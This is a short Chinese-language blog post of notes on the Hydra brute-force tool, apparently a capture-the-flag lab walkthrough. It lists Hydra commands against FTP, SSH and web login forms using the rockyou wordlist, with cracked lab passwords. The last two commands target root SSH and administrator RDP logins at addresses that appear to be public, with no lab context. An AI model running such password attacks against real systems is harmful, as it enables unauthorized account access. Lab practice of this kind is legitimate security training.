***** 参考视频ul00.com blog
https://www
1,启动机器
2, hydra —— hydra -l user -P passlist.txt ftp://192.168.0.1
SSH —— hydra -l <username> -P <full path to pass> <ip> -t 4 ssh
Post Web Form—— hydra -l -P http-post-form “/:username=^USER^&password=^PASS^:F=incorrect” -V
题目1 web password flag1
If you’ve tried more than 30 passwords from RockYou.txt, you are doing something wrong! 提示使用RockYou.txt
**************************注意命令是再>上面执行 (所以先hydra然后进入>命令行执行命令)
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.238.100 http-post-form “/login:username=”^USER^&password=^PASS^:incorrect” -f
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.227 http-post-form “/login:username=^USER^&password=^PASS^:incorrect” 找到密码 sunshine 得到flag1
***大写的-L 表示也要list用户名
问题2 找到flag2
SSH# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.227 ssh
22][ssh] host: 10.10.157.227 login: molly password: butterfly
locate rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
hydra -l root -P /usr/share/wordlists/rockyou.txt 144.217.124.18 ssh
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 5.135.39.185 rdp -v
未经允许不得转载:萌萌guo angline - Apprentissage » hydra实例操作
Pixel art ( 5 )
learn NMAP
